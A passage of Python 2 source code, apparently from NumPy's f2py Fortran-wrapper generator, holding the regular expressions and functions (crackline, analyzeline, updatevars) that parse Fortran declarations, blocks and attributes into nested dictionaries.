groupbegins90=groupbegins77+r'|module(?!\s*procedure)|python\s*module|interface|type(?!\s*\()' beginpattern90=re.compile(beforethisafter%('',groupbegins90,groupbegins90,'.*'),re.I),'begin' groupends=r'end|endprogram|endblockdata|endmodule|endpythonmodule|endinterface' endpattern=re.compile(beforethisafter%('',groupends,groupends,'[\w\s]*'),re.I),'end' #endifs='end\s*(if|do|where|select|while|forall)' endifs='(end\s*(if|do|where|select|while|forall))|(module\s*procedure)' endifpattern=re.compile(beforethisafter%('[\w]*?',endifs,endifs,'[\w\s]*'),re.I),'endif' # implicitpattern=re.compile(beforethisafter%('','implicit','implicit','.*'),re.I),'implicit' dimensionpattern=re.compile(beforethisafter%('','dimension|virtual','dimension|virtual','.*'),re.I),'dimension' externalpattern=re.compile(beforethisafter%('','external','external','.*'),re.I),'external' optionalpattern=re.compile(beforethisafter%('','optional','optional','.*'),re.I),'optional' requiredpattern=re.compile(beforethisafter%('','required','required','.*'),re.I),'required' publicpattern=re.compile(beforethisafter%('','public','public','.*'),re.I),'public' privatepattern=re.compile(beforethisafter%('','private','private','.*'),re.I),'private' intrisicpattern=re.compile(beforethisafter%('','intrisic','intrisic','.*'),re.I),'intrisic' intentpattern=re.compile(beforethisafter%('','intent|depend|note|check','intent|depend|note|check','\s*\(.*?\).*'),re.I),'intent' parameterpattern=re.compile(beforethisafter%('','parameter','parameter','\s*\(.*'),re.I),'parameter' datapattern=re.compile(beforethisafter%('','data','data','.*'),re.I),'data' callpattern=re.compile(beforethisafter%('','call','call','.*'),re.I),'call' entrypattern=re.compile(beforethisafter%('','entry','entry','.*'),re.I),'entry' callfunpattern=re.compile(beforethisafter%('','callfun','callfun','.*'),re.I),'callfun' commonpattern=re.compile(beforethisafter%('','common','common','.*'),re.I),'common' usepattern=re.compile(beforethisafter%('','use','use','.*'),re.I),'use' containspattern=re.compile(beforethisafter%('','contains','contains',''),re.I),'contains' formatpattern=re.compile(beforethisafter%('','format','format','.*'),re.I),'format' ## Non-fortran and f2py-specific statements f2pyenhancementspattern=re.compile(beforethisafter%('','threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef','threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef','.*'),re.I|re.S),'f2pyenhancements' multilinepattern = re.compile(r"\s*(?P<before>''')(?P<this>.*?)(?P<after>''')\s*\Z",re.S),'multiline' ## def _simplifyargs(argsline): a = [] for n in markoutercomma(argsline).split('@,@'): for r in '(),': n = n.replace(r,'_') a.append(n) return ','.join(a) crackline_re_1 = re.compile(r'\s*(?P<result>\b[a-z]+[\w]*\b)\s*[=].*',re.I) def crackline(line,reset=0): """ reset=-1 --- initialize reset=0 --- crack the line reset=1 --- final check if mismatch of blocks occured Cracked data is saved in grouplist[0]. """ global beginpattern,groupcounter,groupname,groupcache,grouplist,gotnextfile,\ filepositiontext,currentfilename,neededmodule,expectbegin,skipblocksuntil,\ skipemptyends,previous_context if ';' in line and not (f2pyenhancementspattern[0].match(line) or multilinepattern[0].match(line)): for l in line.split(';'): assert reset==0,`reset` # XXX: non-zero reset values need testing crackline(l,reset) return if reset<0: groupcounter=0 groupname={groupcounter:''} groupcache={groupcounter:{}} grouplist={groupcounter:[]} groupcache[groupcounter]['body']=[] groupcache[groupcounter]['vars']={} groupcache[groupcounter]['block']='' groupcache[groupcounter]['name']='' neededmodule=-1 skipblocksuntil=-1 return if reset>0: fl=0 if f77modulename and neededmodule==groupcounter: fl=2 while groupcounter>fl: outmess('crackline: groupcounter=%s groupname=%s\n'%(`groupcounter`,`groupname`)) outmess('crackline: Mismatch of blocks encountered. Trying to fix it by assuming "end" statement.\n') grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 if f77modulename and neededmodule==groupcounter: grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 # end interface grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 # end module neededmodule=-1 return if line=='': return flag=0 for pat in [dimensionpattern,externalpattern,intentpattern,optionalpattern, requiredpattern, parameterpattern,datapattern,publicpattern,privatepattern, intrisicpattern, endifpattern,endpattern, formatpattern, beginpattern,functionpattern,subroutinepattern, implicitpattern,typespattern,commonpattern, callpattern,usepattern,containspattern, entrypattern, f2pyenhancementspattern, multilinepattern ]: m = pat[0].match(line) if m: break flag=flag+1 if not m: re_1 = crackline_re_1 if 0<=skipblocksuntil<=groupcounter:return if 'externals' in groupcache[groupcounter]: for name in groupcache[groupcounter]['externals']: if name in invbadnames: name=invbadnames[name] if 'interfaced' in groupcache[groupcounter] and name in groupcache[groupcounter]['interfaced']: continue m1=re.match(r'(?P<before>[^"]*)\b%s\b\s*@\(@(?P<args>[^@]*)@\)@.*\Z'%name,markouterparen(line),re.I) if m1: m2 = re_1.match(m1.group('before')) a = _simplifyargs(m1.group('args')) if m2: line='callfun %s(%s) result (%s)'%(name,a,m2.group('result')) else: line='callfun %s(%s)'%(name,a) m = callfunpattern[0].match(line) if not m: outmess('crackline: could not resolve function call for line=%s.\n'%`line`) return analyzeline(m,'callfun',line) return if verbose>1 or (verbose==1 and currentfilename.lower().endswith('.pyf')): previous_context = None outmess('crackline:%d: No pattern for line\n'%(groupcounter)) return elif pat[1]=='end': if 0<=skipblocksuntil<groupcounter: groupcounter=groupcounter-1 if skipblocksuntil<=groupcounter: return if groupcounter<=0: raise Exception('crackline: groupcounter(=%s) is nonpositive. ' 'Check the blocks.' \ % (groupcounter)) m1 = beginpattern[0].match((line)) if (m1) and (not m1.group('this')==groupname[groupcounter]): raise Exception('crackline: End group %s does not match with ' 'previous Begin group %s\n\t%s' % \ (`m1.group('this')`, `groupname[groupcounter]`, filepositiontext) ) if skipblocksuntil==groupcounter: skipblocksuntil=-1 grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 if not skipemptyends: expectbegin=1 elif pat[1] == 'begin': if 0<=skipblocksuntil<=groupcounter: groupcounter=groupcounter+1 return gotnextfile=0 analyzeline(m,pat[1],line) expectbegin=0 elif pat[1]=='endif': pass elif pat[1]=='contains': if ignorecontains: return if 0<=skipblocksuntil<=groupcounter: return skipblocksuntil=groupcounter else: if 0<=skipblocksuntil<=groupcounter:return analyzeline(m,pat[1],line) def markouterparen(line): l='';f=0 for c in line: if c=='(': f=f+1 if f==1: l=l+'@(@'; continue elif c==')': f=f-1 if f==0: l=l+'@)@'; continue l=l+c return l def markoutercomma(line,comma=','): l='';f=0 cc='' for c in line: if (not cc or cc==')') and c=='(': f=f+1 cc = ')' elif not cc and c=='\'' and (not l or l[-1]!='\\'): f=f+1 cc = '\'' elif c==cc: f=f-1 if f==0: cc='' elif c==comma and f==0: l=l+'@'+comma+'@' continue l=l+c assert not f,`f,line,l,cc` return l def unmarkouterparen(line): r = line.replace('@(@','(').replace('@)@',')') return r def appenddecl(decl,decl2,force=1): if not decl: decl={} if not decl2: return decl if decl is decl2: return decl for k in decl2.keys(): if k=='typespec': if force or k not in decl: decl[k]=decl2[k] elif k=='attrspec': for l in decl2[k]: decl=setattrspec(decl,l,force) elif k=='kindselector': decl=setkindselector(decl,decl2[k],force) elif k=='charselector': decl=setcharselector(decl,decl2[k],force) elif k in ['=','typename']: if force or k not in decl: decl[k]=decl2[k] elif k=='note': pass elif k in ['intent','check','dimension','optional','required']: errmess('appenddecl: "%s" not implemented.\n'%k) else: raise Exception('appenddecl: Unknown variable definition key:' + \ str(k)) return decl selectpattern=re.compile(r'\s*(?P<this>(@\(@.*?@\)@|[*][\d*]+|[*]\s*@\(@.*?@\)@|))(?P<after>.*)\Z',re.I) nameargspattern=re.compile(r'\s*(?P<name>\b[\w$]+\b)\s*(@\(@\s*(?P<args>[\w\s,]*)\s*@\)@|)\s*((result(\s*@\(@\s*(?P<result>\b[\w$]+\b)\s*@\)@|))|(bind\s*@\(@\s*(?P<bind>.*)\s*@\)@))*\s*\Z',re.I) callnameargspattern=re.compile(r'\s*(?P<name>\b[\w$]+\b)\s*@\(@\s*(?P<args>.*)\s*@\)@\s*\Z',re.I) real16pattern = re.compile(r'([-+]?(?:\d+(?:\.\d*)?|\d*\.\d+))[dD]((?:[-+]?\d+)?)') real8pattern = re.compile(r'([-+]?((?:\d+(?:\.\d*)?|\d*\.\d+))[eE]((?:[-+]?\d+)?)|(\d+\.\d*))') _intentcallbackpattern = re.compile(r'intent\s*\(.*?\bcallback\b',re.I) def _is_intent_callback(vdecl): for a in vdecl.get('attrspec',[]): if _intentcallbackpattern.match(a): return 1 return 0 def _resolvenameargspattern(line): line = markouterparen(line) m1=nameargspattern.match(line) if m1: return m1.group('name'),m1.group('args'),m1.group('result'), m1.group('bind') m1=callnameargspattern.match(line) if m1: return m1.group('name'),m1.group('args'),None, None return None,[],None, None def analyzeline(m,case,line): global groupcounter,groupname,groupcache,grouplist,filepositiontext,\ currentfilename,f77modulename,neededinterface,neededmodule,expectbegin,\ gotnextfile,previous_context block=m.group('this') if case != 'multiline': previous_context = None if expectbegin and case not in ['begin','call','callfun','type'] \ and not skipemptyends and groupcounter<1: newname=os.path.basename(currentfilename).split('.')[0] outmess('analyzeline: no group yet. Creating program group with name "%s".\n'%newname) gotnextfile=0 groupcounter=groupcounter+1 groupname[groupcounter]='program' groupcache[groupcounter]={} grouplist[groupcounter]=[] groupcache[groupcounter]['body']=[] groupcache[groupcounter]['vars']={} groupcache[groupcounter]['block']='program' groupcache[groupcounter]['name']=newname groupcache[groupcounter]['from']='fromsky' expectbegin=0 if case in ['begin','call','callfun']: # Crack line => block,name,args,result block = block.lower() if re.match(r'block\s*data',block,re.I): block='block data' if re.match(r'python\s*module',block,re.I): block='python module' name,args,result,bind = _resolvenameargspattern(m.group('after')) if name is None: if block=='block data': name = '_BLOCK_DATA_' else: name = '' if block not in ['interface','block data']: outmess('analyzeline: No name/args pattern found for line.\n') previous_context = (block,name,groupcounter) if args: args=rmbadname([x.strip() for x in markoutercomma(args).split('@,@')]) else: args=[] if '' in args: while '' in args: args.remove('') outmess('analyzeline: argument list is malformed (missing argument).\n') # end of crack line => block,name,args,result needmodule=0 needinterface=0 if case in ['call','callfun']: needinterface=1 if 'args' not in groupcache[groupcounter]: return if name not in groupcache[groupcounter]['args']: return for it in grouplist[groupcounter]: if it['name']==name: return if name in groupcache[groupcounter]['interfaced']: return block={'call':'subroutine','callfun':'function'}[case] if f77modulename and neededmodule==-1 and groupcounter<=1: neededmodule=groupcounter+2 needmodule=1 if block != 'interface': needinterface=1 # Create new block(s) groupcounter=groupcounter+1 groupcache[groupcounter]={} grouplist[groupcounter]=[] if needmodule: if verbose>1: outmess('analyzeline: Creating module block %s\n'%`f77modulename`,0) groupname[groupcounter]='module' groupcache[groupcounter]['block']='python module' groupcache[groupcounter]['name']=f77modulename groupcache[groupcounter]['from']='' groupcache[groupcounter]['body']=[] groupcache[groupcounter]['externals']=[] groupcache[groupcounter]['interfaced']=[] groupcache[groupcounter]['vars']={} groupcounter=groupcounter+1 groupcache[groupcounter]={} grouplist[groupcounter]=[] if needinterface: if verbose>1: outmess('analyzeline: Creating additional interface block (groupcounter=%s).\n' % (groupcounter),0) groupname[groupcounter]='interface' groupcache[groupcounter]['block']='interface' groupcache[groupcounter]['name']='unknown_interface' groupcache[groupcounter]['from']='%s:%s'%(groupcache[groupcounter-1]['from'],groupcache[groupcounter-1]['name']) groupcache[groupcounter]['body']=[] groupcache[groupcounter]['externals']=[] groupcache[groupcounter]['interfaced']=[] groupcache[groupcounter]['vars']={} groupcounter=groupcounter+1 groupcache[groupcounter]={} grouplist[groupcounter]=[] groupname[groupcounter]=block groupcache[groupcounter]['block']=block if not name: name='unknown_'+block groupcache[groupcounter]['prefix']=m.group('before') groupcache[groupcounter]['name']=rmbadname1(name) groupcache[groupcounter]['result']=result if groupcounter==1: groupcache[groupcounter]['from']=currentfilename else: if f77modulename and groupcounter==3: groupcache[groupcounter]['from']='%s:%s'%(groupcache[groupcounter-1]['from'],currentfilename) else: groupcache[groupcounter]['from']='%s:%s'%(groupcache[groupcounter-1]['from'],groupcache[groupcounter-1]['name']) for k in groupcache[groupcounter].keys(): if not groupcache[groupcounter][k]: del groupcache[groupcounter][k] groupcache[groupcounter]['args']=args groupcache[groupcounter]['body']=[] groupcache[groupcounter]['externals']=[] groupcache[groupcounter]['interfaced']=[] groupcache[groupcounter]['vars']={} groupcache[groupcounter]['entry']={} # end of creation if block=='type': groupcache[groupcounter]['varnames'] = [] if case in ['call','callfun']: # set parents variables if name not in groupcache[groupcounter-2]['externals']: groupcache[groupcounter-2]['externals'].append(name) groupcache[groupcounter]['vars']=copy.deepcopy(groupcache[groupcounter-2]['vars']) #try: del groupcache[groupcounter]['vars'][groupcache[groupcounter-2]['name']] #except: pass try: del groupcache[groupcounter]['vars'][name][groupcache[groupcounter]['vars'][name]['attrspec'].index('external')] except: pass if block in ['function','subroutine']: # set global attributes try: groupcache[groupcounter]['vars'][name]=appenddecl(groupcache[groupcounter]['vars'][name],groupcache[groupcounter-2]['vars']['']) except: pass if case=='callfun': # return type if result and result in groupcache[groupcounter]['vars']: if not name==result: groupcache[groupcounter]['vars'][name]=appenddecl(groupcache[groupcounter]['vars'][name],groupcache[groupcounter]['vars'][result]) #if groupcounter>1: # name is interfaced try: groupcache[groupcounter-2]['interfaced'].append(name) except: pass if block=='function': t=typespattern[0].match(m.group('before')+' '+name) if t: typespec,selector,attr,edecl=cracktypespec0(t.group('this'),t.group('after')) updatevars(typespec,selector,attr,edecl) if case in ['call','callfun']: grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 # end routine grouplist[groupcounter-1].append(groupcache[groupcounter]) grouplist[groupcounter-1][-1]['body']=grouplist[groupcounter] del grouplist[groupcounter] groupcounter=groupcounter-1 # end interface elif case=='entry': name,args,result,bind=_resolvenameargspattern(m.group('after')) if name is not None: if args: args=rmbadname([x.strip() for x in markoutercomma(args).split('@,@')]) else: args=[] assert result is None,`result` groupcache[groupcounter]['entry'][name] = args previous_context = ('entry',name,groupcounter) elif case=='type': typespec,selector,attr,edecl=cracktypespec0(block,m.group('after')) last_name = updatevars(typespec,selector,attr,edecl) if last_name is not None: previous_context = ('variable',last_name,groupcounter) elif case in ['dimension','intent','optional','required','external','public','private','intrisic']: edecl=groupcache[groupcounter]['vars'] ll=m.group('after').strip() i=ll.find('::') if i<0 and case=='intent': i=markouterparen(ll).find('@)@')-2 ll=ll[:i+1]+'::'+ll[i+1:] i=ll.find('::') if ll[i:]=='::' and 'args' in groupcache[groupcounter]: outmess('All arguments will have attribute %s%s\n'%(m.group('this'),ll[:i])) ll = ll + ','.join(groupcache[groupcounter]['args']) if i<0:i=0;pl='' else: pl=ll[:i].strip();ll=ll[i+2:] ch = markoutercomma(pl).split('@,@') if len(ch)>1: pl = ch[0] outmess('analyzeline: cannot handle multiple attributes without type specification. Ignoring %r.\n' % (','.join(ch[1:]))) last_name = None for e in [x.strip() for x in markoutercomma(ll).split('@,@')]: m1=namepattern.match(e) if not m1: if case in ['public','private']: k='' else: print m.groupdict() outmess('analyzeline: no name pattern found in %s statement for %s. Skipping.\n'%(case,`e`)) continue else: k=rmbadname1(m1.group('name')) if k not in edecl: edecl[k]={} if case=='dimension': ap=case+m1.group('after') if case=='intent': ap=m.group('this')+pl if _intentcallbackpattern.match(ap): if k not in groupcache[groupcounter]['args']: if groupcounter>1: if '__user__' not in groupcache[groupcounter-2]['name']: outmess('analyzeline: missing __user__ module (could be nothing)\n') if k!=groupcache[groupcounter]['name']: # fixes ticket 1693 outmess('analyzeline: appending intent(callback) %s'\ ' to %s arguments\n' % (k,groupcache[groupcounter]['name'])) groupcache[groupcounter]['args'].append(k) else: errmess('analyzeline: intent(callback) %s is ignored' % (k)) else: errmess('analyzeline: intent(callback) %s is already'\ ' in argument list' % (k)) if case in ['optional','required','public','external','private','intrisic']: ap=case if 'attrspec' in edecl[k]: edecl[k]['attrspec'].append(ap) else: edecl[k]['attrspec']=[ap] if case=='external': if groupcache[groupcounter]['block']=='program': outmess('analyzeline: ignoring program arguments\n') continue if k not in groupcache[groupcounter]['args']: #outmess('analyzeline: ignoring external %s (not in arguments list)\n'%(`k`)) continue if 'externals' not in groupcache[groupcounter]: groupcache[groupcounter]['externals']=[] groupcache[groupcounter]['externals'].append(k) last_name = k groupcache[groupcounter]['vars']=edecl if last_name is not None: previous_context = ('variable',last_name,groupcounter) elif case=='parameter': edecl=groupcache[groupcounter]['vars'] ll=m.group('after').strip()[1:-1] last_name = None for e in markoutercomma(ll).split('@,@'): try: k,initexpr=[x.strip() for x in e.split('=')] except: outmess('analyzeline: could not extract name,expr in parameter statement "%s" of "%s"\n'%(e,ll));continue params = get_parameters(edecl) k=rmbadname1(k) if k not in edecl: edecl[k]={} if '=' in edecl[k] and (not edecl[k]['=']==initexpr): outmess('analyzeline: Overwriting the value of parameter "%s" ("%s") with "%s".\n'%(k,edecl[k]['='],initexpr)) t = determineexprtype(initexpr,params) if t: if t.get('typespec')=='real': tt = list(initexpr) for m in real16pattern.finditer(initexpr): tt[m.start():m.end()] = list(\ initexpr[m.start():m.end()].lower().replace('d', 'e')) initexpr = ''.join(tt) elif t.get('typespec')=='complex': initexpr = initexpr[1:].lower().replace('d','e').\ replace(',','+1j*(') try: v = eval(initexpr,{},params) except (SyntaxError,NameError,TypeError),msg: errmess('analyzeline: Failed to evaluate %r. Ignoring: %s\n'\ % (initexpr, msg)) continue edecl[k]['='] = repr(v) if 'attrspec' in edecl[k]: edecl[k]['attrspec'].append('parameter') else: edecl[k]['attrspec']=['parameter'] last_name = k groupcache[groupcounter]['vars']=edecl if last_name is not None: previous_context = ('variable',last_name,groupcounter) elif case=='implicit': if m.group('after').strip().lower()=='none': groupcache[groupcounter]['implicit']=None elif m.group('after'): if 'implicit' in groupcache[groupcounter]: impl=groupcache[groupcounter]['implicit'] else: impl={} if impl is None: outmess('analyzeline: Overwriting earlier "implicit none" statement.\n') impl={} for e in markoutercomma(m.group('after')).split('@,@'): decl={} m1=re.match(r'\s*(?P<this>.*?)\s*(\(\s*(?P<after>[a-z-, ]+)\s*\)\s*|)\Z',e,re.I) if not m1: outmess('analyzeline: could not extract info of implicit statement part "%s"\n'%(e));continue m2=typespattern4implicit.match(m1.group('this')) if not m2: outmess('analyzeline: could not extract types pattern of implicit statement part "%s"\n'%(e));continue typespec,selector,attr,edecl=cracktypespec0(m2.group('this'),m2.group('after')) kindselect,charselect,typename=cracktypespec(typespec,selector) decl['typespec']=typespec decl['kindselector']=kindselect decl['charselector']=charselect decl['typename']=typename for k in decl.keys(): if not decl[k]: del decl[k] for r in markoutercomma(m1.group('after')).split('@,@'): if '-' in r: try: begc,endc=[x.strip() for x in r.split('-')] except: outmess('analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement\n'%r);continue else: begc=endc=r.strip() if not len(begc)==len(endc)==1: outmess('analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement (2)\n'%r);continue for o in range(ord(begc),ord(endc)+1): impl[chr(o)]=decl groupcache[groupcounter]['implicit']=impl elif case=='data': ll=[] dl='';il='';f=0;fc=1;inp=0 for c in m.group('after'): if not inp: if c=="'": fc=not fc if c=='/' and fc: f=f+1;continue if c=='(': inp = inp + 1 elif c==')': inp = inp - 1 if f==0: dl=dl+c elif f==1: il=il+c elif f==2: dl = dl.strip() if dl.startswith(','): dl = dl[1:].strip() ll.append([dl,il]) dl=c;il='';f=0 if f==2: dl = dl.strip() if dl.startswith(','): dl = dl[1:].strip() ll.append([dl,il]) vars={} if 'vars' in groupcache[groupcounter]: vars=groupcache[groupcounter]['vars'] last_name = None for l in ll: l=[x.strip() for x in l] if l[0][0]==',':l[0]=l[0][1:] if l[0][0]=='(': outmess('analyzeline: implied-DO list "%s" is not supported. Skipping.\n'%l[0]) continue #if '(' in l[0]: # #outmess('analyzeline: ignoring this data statement.\n') # continue i=0;j=0;llen=len(l[1]) for v in rmbadname([x.strip() for x in markoutercomma(l[0]).split('@,@')]): if v[0]=='(': outmess('analyzeline: implied-DO list "%s" is not supported. Skipping.\n'%v) # XXX: subsequent init expressions may get wrong values. # Ignoring since data statements are irrelevant for wrapping. continue fc=0 while (i<llen) and (fc or not l[1][i]==','): if l[1][i]=="'": fc=not fc i=i+1 i=i+1 #v,l[1][j:i-1]=name,initvalue if v not in vars: vars[v]={} if '=' in vars[v] and not vars[v]['=']==l[1][j:i-1]: outmess('analyzeline: changing init expression of "%s" ("%s") to "%s"\n'%(v,vars[v]['='],l[1][j:i-1])) vars[v]['=']=l[1][j:i-1] j=i last_name = v groupcache[groupcounter]['vars']=vars if last_name is not None: previous_context = ('variable',last_name,groupcounter) elif case=='common': line=m.group('after').strip() if not line[0]=='/':line='//'+line cl=[] f=0;bn='';ol='' for c in line: if c=='/':f=f+1;continue if f>=3: bn = bn.strip() if not bn: bn='_BLNK_' cl.append([bn,ol]) f=f-2;bn='';ol='' if f%2: bn=bn+c else: ol=ol+c bn = bn.strip() if not bn: bn='_BLNK_' cl.append([bn,ol]) commonkey={} if 'common' in groupcache[groupcounter]: commonkey=groupcache[groupcounter]['common'] for c in cl: if c[0] in commonkey: outmess('analyzeline: previously defined common block encountered. Skipping.\n') continue commonkey[c[0]]=[] for i in [x.strip() for x in markoutercomma(c[1]).split('@,@')]: if i: commonkey[c[0]].append(i) groupcache[groupcounter]['common']=commonkey previous_context = ('common',bn,groupcounter) elif case=='use': m1=re.match(r'\A\s*(?P<name>\b[\w]+\b)\s*((,(\s*\bonly\b\s*:|(?P<notonly>))\s*(?P<list>.*))|)\s*\Z',m.group('after'),re.I) if m1: mm=m1.groupdict() if 'use' not in groupcache[groupcounter]: groupcache[groupcounter]['use']={} name=m1.group('name') groupcache[groupcounter]['use'][name]={} isonly=0 if 'list' in mm and mm['list'] is not None: if 'notonly' in mm and mm['notonly'] is None: isonly=1 groupcache[groupcounter]['use'][name]['only']=isonly ll=[x.strip() for x in mm['list'].split(',')] rl={} for l in ll: if '=' in l: m2=re.match(r'\A\s*(?P<local>\b[\w]+\b)\s*=\s*>\s*(?P<use>\b[\w]+\b)\s*\Z',l,re.I) if m2: rl[m2.group('local').strip()]=m2.group('use').strip() else: outmess('analyzeline: Not local=>use pattern found in %s\n'%`l`) else: rl[l]=l groupcache[groupcounter]['use'][name]['map']=rl else: pass else: print m.groupdict() outmess('analyzeline: Could not crack the use statement.\n') elif case in ['f2pyenhancements']: if 'f2pyenhancements' not in groupcache[groupcounter]: groupcache[groupcounter]['f2pyenhancements'] = {} d = groupcache[groupcounter]['f2pyenhancements'] if m.group('this')=='usercode' and 'usercode' in d: if type(d['usercode']) is type(''): d['usercode'] = [d['usercode']] d['usercode'].append(m.group('after')) else: d[m.group('this')] = m.group('after') elif case=='multiline': if previous_context is None: if verbose: outmess('analyzeline: No context for multiline block.\n') return gc = groupcounter #gc = previous_context[2] appendmultiline(groupcache[gc], previous_context[:2], m.group('this')) else: if verbose>1: print m.groupdict() outmess('analyzeline: No code implemented for line.\n') def appendmultiline(group, context_name,ml): if 'f2pymultilines' not in group: group['f2pymultilines'] = {} d = group['f2pymultilines'] if context_name not in d: d[context_name] = [] d[context_name].append(ml) return def cracktypespec0(typespec,ll): selector=None attr=None if re.match(r'double\s*complex',typespec,re.I): typespec='double complex' elif re.match(r'double\s*precision',typespec,re.I): typespec='double precision' else: typespec=typespec.strip().lower() m1=selectpattern.match(markouterparen(ll)) if not m1: outmess('cracktypespec0: no kind/char_selector pattern found for line.\n') return d=m1.groupdict() for k in d.keys(): d[k]=unmarkouterparen(d[k]) if typespec in ['complex','integer','logical','real','character','type']: selector=d['this'] ll=d['after'] i=ll.find('::') if i>=0: attr=ll[:i].strip() ll=ll[i+2:] return typespec,selector,attr,ll ##### namepattern=re.compile(r'\s*(?P<name>\b[\w]+\b)\s*(?P<after>.*)\s*\Z',re.I) kindselector=re.compile(r'\s*(\(\s*(kind\s*=)?\s*(?P<kind>.*)\s*\)|[*]\s*(?P<kind2>.*?))\s*\Z',re.I) charselector=re.compile(r'\s*(\((?P<lenkind>.*)\)|[*]\s*(?P<charlen>.*))\s*\Z',re.I) lenkindpattern=re.compile(r'\s*(kind\s*=\s*(?P<kind>.*?)\s*(@,@\s*len\s*=\s*(?P<len>.*)|)|(len\s*=\s*|)(?P<len2>.*?)\s*(@,@\s*(kind\s*=\s*|)(?P<kind2>.*)|))\s*\Z',re.I) lenarraypattern=re.compile(r'\s*(@\(@\s*(?!/)\s*(?P<array>.*?)\s*@\)@\s*[*]\s*(?P<len>.*?)|([*]\s*(?P<len2>.*?)|)\s*(@\(@\s*(?!/)\s*(?P<array2>.*?)\s*@\)@|))\s*(=\s*(?P<init>.*?)|(@\(@|)/\s*(?P<init2>.*?)\s*/(@\)@|)|)\s*\Z',re.I) def removespaces(expr): expr=expr.strip() if len(expr)<=1: return expr expr2=expr[0] for i in range(1,len(expr)-1): if expr[i]==' ' and \ ((expr[i+1] in "()[]{}=+-/* ") or (expr[i-1] in "()[]{}=+-/* ")): continue expr2=expr2+expr[i] expr2=expr2+expr[-1] return expr2 def markinnerspaces(line): l='';f=0 cc='\'' cc1='"' cb='' for c in line: if cb=='\\' and c in ['\\','\'','"']: l=l+c; cb=c continue if f==0 and c in ['\'','"']: cc=c; cc1={'\'':'"','"':'\''}[c] if c==cc:f=f+1 elif c==cc:f=f-1 elif c==' ' and f==1: l=l+'@_@'; continue l=l+c;cb=c return l def updatevars(typespec,selector,attrspec,entitydecl): global groupcache,groupcounter last_name = None kindselect,charselect,typename=cracktypespec(typespec,selector) if attrspec: attrspec=[x.strip() for x in markoutercomma(attrspec).split('@,@')] l = [] c = re.compile(r'(?P<start>[a-zA-Z]+)') for a in attrspec: if not a: continue m = c.match(a) if m: s = m.group('start').lower() a = s + a[len(s):] l.append(a) attrspec = l el=[x.strip() for x in markoutercomma(entitydecl).split('@,@')] el1=[] for e in el: for e1 in [x.strip() for x in markoutercomma(removespaces(markinnerspaces(e)),comma=' ').split('@ @')]: if e1: el1.append(e1.replace('@_@',' ')) for e in el1: m=namepattern.match(e) if not m: outmess('updatevars: no name pattern found for entity=%s. Skipping.\n'%(`e`)) continue ename=rmbadname1(m.group('name')) edecl={} if ename in groupcache[groupcounter]['vars']: edecl=groupcache[groupcounter]['vars'][ename].copy() not_has_typespec = 'typespec' not in edecl if not_has_typespec: edecl['typespec']=typespec elif typespec and (not typespec==edecl['typespec']): outmess('updatevars: attempt to change the type of "%s" ("%s") to "%s". Ignoring.\n' % (ename,edecl['typespec'],typespec)) if 'kindselector' not in edecl: edecl['kindselector']=copy.copy(kindselect) elif kindselect: for k in kindselect.keys(): if k in edecl['kindselector'] and (not kindselect[k]==edecl['kindselector'][k]): outmess('updatevars: attempt to change the kindselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (k,ename,edecl['kindselector'][k],kindselect[k])) else: edecl['kindselector'][k]=copy.copy(kindselect[k]) if 'charselector' not in edecl and charselect: if not_has_typespec: edecl['charselector']=charselect else: errmess('updatevars:%s: attempt to change empty charselector to %r. Ignoring.\n' \ %(ename,charselect)) elif charselect: for k in charselect.keys(): if k in edecl['charselector'] and (not charselect[k]==edecl['charselector'][k]): outmess('updatevars: attempt to change the charselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (k,ename,edecl['charselector'][k],charselect[k])) else: edecl['charselector'][k]=copy.copy(charselect[k]) if 'typename' not in edecl: edecl['typename']=typename elif typename and (not edecl['typename']==typename): outmess('updatevars: attempt to change the typename of "%s" ("%s") to "%s". Ignoring.\n' % (ename,edecl['typename'],typename)) if 'attrspec' not in edecl: edecl['attrspec']=copy.copy(attrspec) elif attrspec: for a in attrspec: if a not in edecl['attrspec']: edecl['attrspec'].append(a) else: edecl['typespec']=copy.copy(typespec) edecl['kindselector']=copy.copy(kindselect) edecl['charselector']=copy.copy(charselect) edecl['typename']=typename edecl['attrspec']=copy.copy(attrspec) if m.group('after'): m1=lenarraypattern.match(markouterparen(m.group('after'))) if m1: d1=m1.groupdict() for lk in ['len','array','init']: if d1[lk+'2'] is not None: d1[lk]=d1[lk+'2']; del d1[lk+'2'] for k in d1.keys(): if d1[k] is not None: d1[k]=unmarkouterparen(d1[k]) else: del d1[k] if 'len' in d1 and 'array' in d1: if d1['len']=='': d1['len']=d1['array'] del d1['array'] else: d1['array']=d1['array']+','+d1['len'] del d1['len'] errmess('updatevars: "%s %s" is mapped to "%s %s(%s)"\n'%(typespec,e,typespec,ename,d1['array'])) if 'array' in d1: dm = 'dimension(%s)'%d1['array'] if 'attrspec' not in edecl or (not edecl['attrspec']): edecl['attrspec']=[dm] else: edecl['attrspec'].append(dm) for dm1 in edecl['attrspec']: if dm1[:9]=='dimension' and dm1!=dm: del edecl['attrspec'][-1] errmess('updatevars:%s: attempt to change %r to %r. Ignoring.\n' \ % (ename,dm1,dm)) break if 'len' in d1: if typespec in ['complex','integer','logical','real']: if ('kindselector' not in edecl) or (not edecl['kindselector']): edecl['kindselector']={} edecl['kindselector']['*']=d1['len'] elif typespec == 'character': if ('charselector' not in edecl) or (not edecl['charselector']): edecl['charselector']={} if 'len' in edecl['charselector']: del edecl['charselector']['len'] edecl['charselector']['*']=d1['len'] if 'init' in d1: if '=' in edecl and (not edecl['=']==d1['init']): outmess('updatevars: attempt to change the init expression of 